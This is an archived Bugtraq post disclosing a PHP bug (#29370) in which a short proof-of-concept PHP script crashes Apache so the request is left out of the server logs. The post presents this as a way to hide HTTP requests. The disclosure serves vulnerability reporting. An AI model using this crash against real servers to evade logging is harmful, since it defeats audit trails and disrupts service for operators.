[PHP Bug] How to hide a HTTP request in the apache logs

• Previous message: Stefan Seifert: "Re: SuSE Linux K-Menu YAST Control Center Priviledge Escalation Vulnerability"
• Next in thread: Steve Brown: "Re: [PHP Bug] How to hide a HTTP request in the apache logs"
• Reply: Steve Brown: "Re: [PHP Bug] How to hide a HTTP request in the apache logs"
• Reply: Max Valdez: "Re: [PHP Bug] How to hide a HTTP request in the apache logs"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 6 Aug 2004 23:25:16 -0000
To: bugtraq@securityfocus.com

Author: Debhian ( anthony.debhian -AT- only-for.info )
PHP Bug #29370

Description:
 With a certain code, PHP causes a segfault in Apache and the request is not logged.
 This bug (under Windows) causes an error fatal of apache BUT the server is not stopped with this code.
 The bug seems to work on all config (php4 / php5 && windows / unix)
 

Tested system:
 Windows / Apache 1.3.31 / PHP 5.0.0
 Windows / Apache 1.3.27 / PHP 4.3.3
 Linux / Apache 1.3.24 / PHP 4.2.1

Proof of concept:

 <?
 function funcfunc($array,$space="")
 {
  foreach($array as $key=>$value) { if(is_array($array[$key])) { $src.=$key; } }
  return $src;
 }

 function funcfunc2($array,$test)
 {
  foreach($array['test'] as $key=>$value) { }
  return $array;
 }

 $test['debhy']['debhou']="test1";
 $test['debhian']['debh']="test2";
 $array=funcfunc($test);
 $array=funcfunc2($array,"test");
 ?>

Solution:
 The php team has not answered the posted bug yet.

• Previous message: Stefan Seifert: "Re: SuSE Linux K-Menu YAST Control Center Priviledge Escalation Vulnerability"
• Next in thread: Steve Brown: "Re: [PHP Bug] How to hide a HTTP request in the apache logs"
• Reply: Steve Brown: "Re: [PHP Bug] How to hide a HTTP request in the apache logs"
• Reply: Max Valdez: "Re: [PHP Bug] How to hide a HTTP request in the apache logs"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]